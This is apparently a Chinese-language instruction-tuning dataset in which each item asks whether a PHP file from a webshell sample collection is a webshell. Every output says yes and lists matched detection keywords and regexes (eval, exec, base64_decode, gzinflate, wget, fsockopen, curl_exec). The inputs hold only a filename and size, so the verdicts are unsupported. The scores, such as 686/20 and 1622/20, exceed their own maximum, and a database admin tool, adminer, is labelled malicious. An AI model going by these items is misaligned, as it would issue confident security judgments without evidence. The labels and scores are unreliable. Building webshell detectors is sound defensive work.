{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b7fb26acac87de02a9f6b94b029fa676.php\", \"文件类型\": \"php\", \"文件大小\": \"65648 bytes\", \"行数\": 1782}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, gzinflate(, str_rot13(, file_get_contents( 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: wget, fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 686/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/b7fb26acac87de02a9f6b94b029fa676.php", "malicious_score": 686, "md5_hash": "e20a3556c6b42ccc15163be62dd67581"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b05b99eadaefc998a0179025b3b2f552.php\", \"文件类型\": \"php\", \"文件大小\": \"70500 bytes\", \"行数\": 1461}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, fputs(, exec(, $_POST[ 发现混淆技术: base64_decode, chr\\s*\\( 包含网络功能: wget, fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 856/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/b05b99eadaefc998a0179025b3b2f552.php", "malicious_score": 856, "md5_hash": "4a83fb4138bd47ab3841ecd471ee5cac"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"0dcbe4048a94e115fab3ee73722b2322.php\", \"文件类型\": \"php\", \"文件大小\": \"29030 bytes\", \"行数\": 730}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, exec(, eval(, $_POST[ 发现混淆技术: base64_decode 包含网络功能: wget, urllib 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 278/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/0dcbe4048a94e115fab3ee73722b2322.php", "malicious_score": 278, "md5_hash": "b2655a9ec99d0c465c3f57c659abb47e"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"3c7b93811ffd056b5952b80a517c10c2.php\", \"文件类型\": \"php\", \"文件大小\": \"138630 bytes\", \"行数\": 2488}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, fputs( 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1035/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/3c7b93811ffd056b5952b80a517c10c2.php", "malicious_score": 1035, "md5_hash": "794967b6927e7e1d37cc555ac61ad074"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Rem.php\", \"文件类型\": \"php\", \"文件大小\": \"88607 bytes\", \"行数\": 2553}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, system(, eval(, base64_decode( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 47/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/Rem.php", "malicious_score": 47, "md5_hash": "0b58e6f54ef3861af5de2f064dd4e3f6"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"7a3ca8e68648fcc0dcab19d9bc125cd8.php\", \"文件类型\": \"php\", \"文件大小\": \"8987 bytes\", \"行数\": 234}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, fwrite(, exec(, eval(, passthru( 发现混淆技术: chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, fwrite\\s*\\( 恶意度评分: 56/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/7a3ca8e68648fcc0dcab19d9bc125cd8.php", "malicious_score": 56, "md5_hash": "5fda888e2cf9abbe71ea299e154805ab"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"86b02f64056978588b41c2840a577049.php\", \"文件类型\": \"php\", \"文件大小\": \"9042 bytes\", \"行数\": 206}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, system(, eval( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 16/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/86b02f64056978588b41c2840a577049.php", "malicious_score": 16, "md5_hash": "d9acefc40748df4a8dc062fd2627bd69"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"md5.php\", \"文件类型\": \"php\", \"文件大小\": \"372 bytes\", \"行数\": 14}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/md5.php", "malicious_score": 6, "md5_hash": "83a6274f45812866831fb90e2fd3366f"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wpip.php\", \"文件类型\": \"php\", \"文件大小\": \"2135 bytes\", \"行数\": 51}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, exec( 包含网络功能: curl_exec 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/wpip.php", "malicious_score": 13, "md5_hash": "ae976d6d332cee69d7898b6c0da86034"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"galerz.php\", \"文件类型\": \"php\", \"文件大小\": \"8417 bytes\", \"行数\": 293}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_GET[, $_POST[, file_get_contents( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 118/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/galerz.php", "malicious_score": 118, "md5_hash": "bf54636e5664439383a27f7f8b125203"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"res7.php\", \"文件类型\": \"php\", \"文件大小\": \"224 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: str_rot13(, gzinflate(, file_get_contents(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate, str_rot13 包含网络功能: file_get_contents\\s*\\(\\s*[\"\\']https?:// 恶意度评分: 25/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/res7.php", "malicious_score": 25, "md5_hash": "ef0260328b07e557252c34fc9bef9451"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"sufpre.php\", \"文件类型\": \"php\", \"文件大小\": \"650 bytes\", \"行数\": 22}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/sufpre.php", "malicious_score": 12, "md5_hash": "b14735a16a722e40606e5452eeac52f2"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"vhost.php\", \"文件类型\": \"php\", \"文件大小\": \"1346 bytes\", \"行数\": 18}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system(, fwrite (, base64_decode( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 16/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/vhost.php", "malicious_score": 16, "md5_hash": "7aae38c8db8ea4e8f3a0a2c9f3777d32"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"email.php\", \"文件类型\": \"php\", \"文件大小\": \"2930 bytes\", \"行数\": 105}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/email.php", "malicious_score": 6, "md5_hash": "8039f37685ce176c41561ffce1aa1bdb"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"adminer-4.2.4.php\", \"文件类型\": \"php\", \"文件大小\": \"422812 bytes\", \"行数\": 5588}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, file_get_contents(, fwrite(, $_COOKIE[, $_POST[ 发现混淆技术: unpack\\s*\\(, base64_decode, pack\\s*\\( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, fwrite\\s*\\( 恶意度评分: 1622/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/adminer-4.2.4.php", "malicious_score": 1622, "md5_hash": "bb5f37db00535fa2824ac9ca3b25027b"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bin.php\", \"文件类型\": \"php\", \"文件大小\": \"1052 bytes\", \"行数\": 41}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, file_get_contents( 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/bin.php", "malicious_score": 9, "md5_hash": "5e0d0f8bf0139e3b00b30386302a6955"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cor0_id.php\", \"文件类型\": \"php\", \"文件大小\": \"231937 bytes\", \"行数\": 4255}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, str_rot13(, gzinflate(, file_get_contents(, $_GET[ 发现混淆技术: base64_decode, gzinflate, str_rot13 包含网络功能: wget, file_get_contents\\s*\\(\\s*[\"\\']https?://, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 885/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/cor0_id.php", "malicious_score": 885, "md5_hash": "2b6906addaba92e22471ba35c30cf8e1"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"IndoXploit.php\", \"文件类型\": \"php\", \"文件大小\": \"90038 bytes\", \"行数\": 2120}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, $_GET[, fwrite(, fputs( 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, file_get_contents\\s*\\(\\s*[\"\\']https?://, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 667/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/IndoXploit.php", "malicious_score": 667, "md5_hash": "451189c452264a0062ab37eff3d6ba3d"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso.php\", \"文件类型\": \"php\", \"文件大小\": \"67507 bytes\", \"行数\": 1519}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_COOKIE[, $_POST[, exec( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 952/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/wso.php", "malicious_score": 952, "md5_hash": "35987e511c99af82555eddade29bc48a"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"separator.php\", \"文件类型\": \"php\", \"文件大小\": \"755 bytes\", \"行数\": 28}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/separator.php", "malicious_score": 12, "md5_hash": "7944f911337dad9bb15a333324564cf5"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"base64.php\", \"文件类型\": \"php\", \"文件大小\": \"518 bytes\", \"行数\": 21}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/base64.php", "malicious_score": 11, "md5_hash": "ab9aa1d5bbf93099b1d422d591412be0"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"k2ll3d.php\", \"文件类型\": \"php\", \"文件大小\": \"108485 bytes\", \"行数\": 274}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, gzinflate(, file_get_contents(, $_GET[ 发现混淆技术: gzinflate, ord\\s*\\(, base64_decode 包含网络功能: curl_exec, wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 990/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/k2ll3d.php", "malicious_score": 990, "md5_hash": "823f3a4f409c44ab9725e68bac30c494"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"joomlaip.php\", \"文件类型\": \"php\", \"文件大小\": \"2006 bytes\", \"行数\": 49}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, exec( 包含网络功能: curl_exec 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/joomlaip.php", "malicious_score": 13, "md5_hash": "1ec05b55f4ff31620e437973eb295a31"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"remove.php\", \"文件类型\": \"php\", \"文件大小\": \"502 bytes\", \"行数\": 16}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/IndoXploit/remove.php", "malicious_score": 6, "md5_hash": "3b725d119099306a4ccb8b042da5bbe2"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"csh.php\", \"文件类型\": \"php\", \"文件大小\": \"12651 bytes\", \"行数\": 334}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, $_POST[, exec(, system(, eval( 具备文件操作能力: copy\\s*\\( 恶意度评分: 43/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/401/csh.php", "malicious_score": 43, "md5_hash": "194a9d3f3eac8bc56d9a7c55c016af96"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"a42ba22fb215f755779cf3afe417121b.php\", \"文件类型\": \"php\", \"文件大小\": \"8686 bytes\", \"行数\": 259}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[ 恶意度评分: 57/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/401/a42ba22fb215f755779cf3afe417121b.php", "malicious_score": 57, "md5_hash": "f8a6d5306fb37414c5c772315a27832f"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cba3e0e2e0bc97e937acf08c46f6d04c.php\", \"文件类型\": \"php\", \"文件大小\": \"81456 bytes\", \"行数\": 1925}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, fputs(, exec(, $_POST[ 发现混淆技术: base64_decode, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 698/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/401/cba3e0e2e0bc97e937acf08c46f6d04c.php", "malicious_score": 698, "md5_hash": "d2623b6e22e7bbce884347cb781540aa"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"NIX.php\", \"文件类型\": \"php\", \"文件大小\": \"53629 bytes\", \"行数\": 1480}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, fputs(, exec( 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 458/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/401/NIX.php", "malicious_score": 458, "md5_hash": "050dbb26dd94b20a76148ae3ec727bb2"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"3eb96d2bd532ff487617dd91948f8943.php\", \"文件类型\": \"php\", \"文件大小\": \"131456 bytes\", \"行数\": 2652}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 248/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/401/3eb96d2bd532ff487617dd91948f8943.php", "malicious_score": 248, "md5_hash": "1102f606d9e6c5a50727031002812806"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"d323c6197032e14e174ddc8ee6f0667c.php\", \"文件类型\": \"php\", \"文件大小\": \"158613 bytes\", \"行数\": 7006}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, $_GET[, fwrite( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 257/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/401/d323c6197032e14e174ddc8ee6f0667c.php", "malicious_score": 257, "md5_hash": "6ac53ed0fcb9d1b92361406b3edfdbc8"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mod_system.php\", \"文件类型\": \"php\", \"文件大小\": \"44355 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/401/mod_system.php", "malicious_score": 13, "md5_hash": "c4400c36a0a1cd5b02f7a687587be87b"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"5017463aeae9d9c7fec3c2ae5ef17411.php\", \"文件类型\": \"php\", \"文件大小\": \"161917 bytes\", \"行数\": 3168}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 273/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/401/5017463aeae9d9c7fec3c2ae5ef17411.php", "malicious_score": 273, "md5_hash": "27786d1e0b1046a1a7f67ee41c64bf4c"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"AwesomeWare.php\", \"文件类型\": \"php\", \"文件大小\": \"8307 bytes\", \"行数\": 233}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, $_POST[, base64_decode( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, file_put_contents, unlink\\s*\\( 恶意度评分: 42/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/ransomware/AwesomeWare.php", "malicious_score": 42, "md5_hash": "85ff8047cfe1d3c8f4e82a5dac4afec3"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wget.php\", \"文件类型\": \"php\", \"文件大小\": \"2004 bytes\", \"行数\": 63}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 包含网络功能: wget 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/wget.php", "malicious_score": 13, "md5_hash": "598bf7e25b59d1796e38f6bae1e91ec1"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1148d726e3bdec6db65db30c08a75f80.php\", \"文件类型\": \"php\", \"文件大小\": \"820 bytes\", \"行数\": 30}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, eval(, fwrite( 包含网络功能: fsockopen 具备文件操作能力: file_put_contents, fwrite\\s*\\( 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/1148d726e3bdec6db65db30c08a75f80.php", "malicious_score": 12, "md5_hash": "b83d76e4d24249f1adda5502a2799b21"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"8fbd08553ec9c84448eddf5600d376e5.php\", \"文件类型\": \"php\", \"文件大小\": \"19611 bytes\", \"行数\": 357}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, fwrite(, base64_decode( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, file_put_contents, fwrite\\s*\\( 恶意度评分: 47/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/8fbd08553ec9c84448eddf5600d376e5.php", "malicious_score": 47, "md5_hash": "4449148c994431c93d38cfade8f237bd"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"49118e1d7f2f8ea5ee3e0321f03d69b3.php\", \"文件类型\": \"php\", \"文件大小\": \"179 bytes\", \"行数\": 5}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/49118e1d7f2f8ea5ee3e0321f03d69b3.php", "malicious_score": 6, "md5_hash": "594d1b1311bbef38a0eb3d6cbb1ab538"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"7bdff76536f12a7c5ffde207e72cfe3a.php\", \"文件类型\": \"php\", \"文件大小\": \"32 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/7bdff76536f12a7c5ffde207e72cfe3a.php", "malicious_score": 6, "md5_hash": "1d6335247f58e0a5b03e17977888f5f2"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"9dd4e461268c8034f5c8564e155c67a6.php\", \"文件类型\": \"php\", \"文件大小\": \"134 bytes\", \"行数\": 3}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/9dd4e461268c8034f5c8564e155c67a6.php", "malicious_score": 15, "md5_hash": "7e5e2fc5fad83f88fd2ab5cb41a1ea5d"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wget2.php\", \"文件类型\": \"php\", \"文件大小\": \"4843 bytes\", \"行数\": 96}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 包含网络功能: wget 恶意度评分: 31/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/wget2.php", "malicious_score": 31, "md5_hash": "219f87c99b1e3c73e666826f5f86bd0c"}}
